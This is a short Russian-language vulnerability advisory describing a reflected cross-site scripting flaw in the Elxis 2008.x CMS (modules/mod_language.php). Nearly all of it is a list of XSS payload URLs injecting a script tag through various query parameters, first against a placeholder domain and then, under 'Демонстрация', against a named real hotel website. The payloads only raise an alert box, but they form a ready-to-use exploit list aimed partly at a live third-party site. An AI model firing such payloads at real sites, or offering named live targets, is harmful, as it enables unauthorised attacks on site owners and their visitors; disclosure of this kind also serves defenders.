Программа: Elxis 2008.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных сценарием modules/mod_language.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

http://www.site.com/?>’"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php/>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&id=>"><script>alert("XSS
Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS
Vuln")</script>

http://www.site.com/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS
Vuln")</script>

http://www.site.com/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS
Vuln")</script>

Демонстрация:

http://www.hotelsinalbania.net/?>’"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php/>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=>"><script>alert("XSS Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS
Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS
Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS
Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS
Vuln")</script>

http://www.hotelsinalbania.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS
Vuln")</script>



Оставить мнение